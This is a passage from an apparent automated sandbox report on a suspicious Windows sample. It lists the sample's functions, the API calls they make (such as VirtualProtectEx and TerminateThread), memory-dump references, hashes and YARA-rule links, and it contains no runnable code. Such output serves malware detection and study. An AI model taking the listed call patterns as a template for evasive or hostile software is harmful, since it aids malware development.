                                                                                                                                  • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4193868204-0
                                                                                                                                  • Opcode ID: f83bca711875c45d170ae14931bd1c8e6e6adef336c538e2c5c6ee4da0c0b023
                                                                                                                                  • Instruction ID: 51f908ae1e85edefdfd5d1d3c9da0265cb9a9646b7fd4f3e0dbd9d02080312e2
                                                                                                                                  • Opcode Fuzzy Hash: f83bca711875c45d170ae14931bd1c8e6e6adef336c538e2c5c6ee4da0c0b023
                                                                                                                                  • Instruction Fuzzy Hash: 8F015731711B8482EB10CB22A89879A7362F788BC4FD48034DE4A43B54DE3CD5868780
                                                                                                                                  Function 1C563BE4 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,1C56387C), ref: 1C563C00
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,1C56387C), ref: 1C563C0E
                                                                                                                                  • VirtualProtectEx.KERNEL32(?,?,?,?,?,1C56387C), ref: 1C563C30
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,1C56387C), ref: 1C563C4E
                                                                                                                                  • VirtualProtectEx.KERNEL32(?,?,?,?,?,1C56387C), ref: 1C563C6F
                                                                                                                                  • TerminateThread.KERNEL32(?,?,?,?,?,1C56387C), ref: 1C563C7E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 449555515-0
                                                                                                                                  • Opcode ID: cb96bd636d75ef0150aa004f7367dade5eb8c58e0f15bd5ff47d86791bf19fa4
                                                                                                                                  • Instruction ID: 11a5d36b373982123a5e76364d13748cebfb1d2f8d31dd36bd8388f88e47846d
                                                                                                                                  • Opcode Fuzzy Hash: cb96bd636d75ef0150aa004f7367dade5eb8c58e0f15bd5ff47d86791bf19fa4
                                                                                                                                  • Instruction Fuzzy Hash: F4014C75641B8082FB209B62E84CB9A73A2BF59B89F840028CE4E06764EF3DD0D8C710
                                                                                                                                  Function 1C5634D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CombinePath
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3422762182-91387939
                                                                                                                                  • Opcode ID: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction ID: 53253a9431956a60421cf7449046c09963ade99d4db046d7171fa7bae2eb1e12
                                                                                                                                  • Opcode Fuzzy Hash: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction Fuzzy Hash: 90F05870724FD482FB008F13B9147AAB322AB48FC4F889020EE0A0BF29DE28D4C18300
                                                                                                                                  Function 1C56B6C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction ID: 74e7441cc709b2c7a07dbbc3620493750a816427a60f2d25ce20d11238dd6a69
                                                                                                                                  • Opcode Fuzzy Hash: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction Fuzzy Hash: E2F0BE71312B0081FF148B24E884BA97321EB89BA5FE41719CA6A46AF4CF3CD0C8C320
                                                                                                                                  Function 1C565C10 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1C565C26
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  • Opcode ID: 4ef01c9fa45567bbc3dd10e801282b8f302988525e8607d28c09eeec96ddb721
                                                                                                                                  • Instruction ID: 0249ca6411a9e03c48fd47e8ad83bbd21056c56c996e4d3b1153b9e4003593fd
                                                                                                                                  • Opcode Fuzzy Hash: 4ef01c9fa45567bbc3dd10e801282b8f302988525e8607d28c09eeec96ddb721
                                                                                                                                  • Instruction Fuzzy Hash: 7E51E836559B94C6EB60CB16E49475AB7B0F3C8B88F500216EA8E87F68DB7CC584CF14
                                                                                                                                  Function 1C568A60 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __except_validate_context_record.LIBVCRUNTIME ref: 1C568A8B
                                                                                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 1C568B22
                                                                                                                                  • RtlUnwindEx.NTDLL ref: 1C568B7C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                  • Opcode ID: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction ID: 23bbda428f52d9562082be2be111b165a62f6c801b3ef210a5daca6bc149dd8f
                                                                                                                                  • Opcode Fuzzy Hash: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction Fuzzy Hash: 065127B2313A60CBEB04CF26E444B5D7362F754B9CF518225EE5A4BB18EB79D485C710
                                                                                                                                  Function 1C56A86C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __except_validate_context_record.LIBVCRUNTIME ref: 1C56A894
                                                                                                                                  • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 1C56A97C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  • Opcode ID: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction ID: 57e72838cbf044be63825e428182b34121552cab6e3ab51f943dae81eb595630
                                                                                                                                  • Opcode Fuzzy Hash: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction Fuzzy Hash: 7851AE366007E1CBDB208F23D64134D77A1F785B98F258226DB9A87F95CB38D4A1CB25
                                                                                                                                  Function 1C56A4BC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EncodePointer.KERNEL32 ref: 1C56A51B
                                                                                                                                  • _CallSETranslator.LIBVCRUNTIME ref: 1C56A567
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                  • Opcode ID: 422e28baaeae7ac14bcee333ee3501689d432e8c3f34beb3876b8884b2d0f2c3
                                                                                                                                  • Instruction ID: 64cbb5059ce934bf180ac60bcb7ef5c21b685ad99f0c3e0d7bba46323fdc2db9
                                                                                                                                  • Opcode Fuzzy Hash: 422e28baaeae7ac14bcee333ee3501689d432e8c3f34beb3876b8884b2d0f2c3
                                                                                                                                  • Instruction Fuzzy Hash: 99518832908BC486DB21CF26E4817DABBA0F789B98F148215EB9917F59DB7CD194CB10
                                                                                                                                  Function 1C563720 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • StrCmpNW.SHLWAPI ref: 1C563742
                                                                                                                                  • StrStrW.SHLWAPI ref: 1C563760
                                                                                                                                  • StrToIntW.SHLWAPI ref: 1C563787
                                                                                                                                    • Part of subcall function 1C561A30: OpenProcess.KERNEL32 ref: 1C561A56
                                                                                                                                    • Part of subcall function 1C561A30: K32GetProcessImageFileNameW.KERNEL32 ref: 1C561A72
                                                                                                                                    • Part of subcall function 1C561A30: PathFindFileNameW.SHLWAPI ref: 1C561A81
                                                                                                                                    • Part of subcall function 1C561A30: lstrlenW.KERNEL32 ref: 1C561A8D
                                                                                                                                    • Part of subcall function 1C561A30: StrCpyW.SHLWAPI ref: 1C561AA0
                                                                                                                                    • Part of subcall function 1C561A30: CloseHandle.KERNEL32 ref: 1C561AAE
                                                                                                                                    • Part of subcall function 1C563D4C: StrCmpNIW.SHLWAPI(?,?,?,1C562722), ref: 1C563D64
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                                                                                  • String ID: pid_
                                                                                                                                  • API String ID: 4193868204-4147670505
                                                                                                                                  • Opcode ID: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction ID: ad9e6a668e477cdba7480d7190cc0ae2a5b215ae434b1c946c426589a13a716e
                                                                                                                                  • Opcode Fuzzy Hash: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction Fuzzy Hash: 5D11C175314BA192FB008B25E84038AA3A5FB88B80FD00121DE4CD3F65EF78EA89C310
                                                                                                                                  Function 1C571D68 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                  • Opcode ID: 1e5131369e73c8b0b3a82c3b3899f962dfdd68d3e046a9ea647a68590475b17d
                                                                                                                                  • Instruction ID: ef02df1c4b44d8586d83b8aefcbb1d71eeead465b3e9e072ce739c14216d5428
                                                                                                                                  • Opcode Fuzzy Hash: 1e5131369e73c8b0b3a82c3b3899f962dfdd68d3e046a9ea647a68590475b17d
                                                                                                                                  • Instruction Fuzzy Hash: EAC1AC32B15B94CAE701CFB6D8406DD3BB6F394BD8B804216CE5EA7B58DA34D18AC350
                                                                                                                                  Function 1C5614A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,1C5619C5,?,?,00000000,1C561CB9), ref: 1C5614C6
                                                                                                                                  • HeapFree.KERNEL32(?,?,?,1C5619C5,?,?,00000000,1C561CB9), ref: 1C5614D5
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,1C5619C5,?,?,00000000,1C561CB9), ref: 1C5614E2
                                                                                                                                  • HeapFree.KERNEL32(?,?,?,1C5619C5,?,?,00000000,1C561CB9), ref: 1C5614F1
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,1C5619C5,?,?,00000000,1C561CB9), ref: 1C561501
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3168794593-0
                                                                                                                                  • Opcode ID: c2c0360827517a06e8d0680bc42561039c20425810adeb3802ef81e067c22a51
                                                                                                                                  • Instruction ID: df2e06687fad79c68ae7de59acaa4d81b8ec71b12ae9189d5c8d584cc4baf3f7
                                                                                                                                  • Opcode Fuzzy Hash: c2c0360827517a06e8d0680bc42561039c20425810adeb3802ef81e067c22a51
                                                                                                                                  • Instruction Fuzzy Hash: 9001D732651F90C6E704DFA6E80479A77A2F788F85F894425DA8A53B28DE38E495C740
                                                                                                                                  Function 1C5726B4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,1C57269F), ref: 1C5727D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleMode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4145635619-0
                                                                                                                                  • Opcode ID: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
                                                                                                                                  • Instruction ID: 3f49dac071e7d74e4d186bcf585ddaaca5952598475624dd6b7ca20fc37ca6b2
                                                                                                                                  • Opcode Fuzzy Hash: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
                                                                                                                                  • Instruction Fuzzy Hash: F981B036B10B90C9EB04CF669C507AE3B61F388BD8F94510ADE4A67B54DB35D0C5C720
                                                                                                                                  Function 1C572420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: U
                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                  • Opcode ID: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction ID: 5f9911d385f10e48880365f4176d329ee9ed4f4a1263447847b2e00ac6478954
                                                                                                                                  • Opcode Fuzzy Hash: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction Fuzzy Hash: BC31E072625B90C6D710CF6AE8047DAB7A1F3887D4FC14126EE8D8B718EB38C485C760
                                                                                                                                  Function 1C568F38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlPcToFileHeader.NTDLL ref: 1C568F88
                                                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,1C5685B7), ref: 1C568FC9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                  • Opcode ID: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction ID: e65616697dbee9e63aca3a43ed928cd6429cc41270d6abb8f517d87ab5712a44
                                                                                                                                  • Opcode Fuzzy Hash: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction Fuzzy Hash: FA110D72215B8482EB118F16F440349B7A5F788B98F984225EF8D07B24DF3DC591CB00
                                                                                                                                  Function 1C561D2C Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 756756679-0
                                                                                                                                  • Opcode ID: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction ID: dcf7de9264fcee385e45595588e4e03a25b225b9809b616660549cca623fc515
                                                                                                                                  • Opcode Fuzzy Hash: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction Fuzzy Hash: 98012D35A11F9081EB05CFA7E50875A77B1FB89FD5F994124DE8D53B24DE38E4868340
                                                                                                                                  Function 1C561264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56126A
                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561279
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561293
                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5612A4
                                                                                                                                  Memory Dump Source
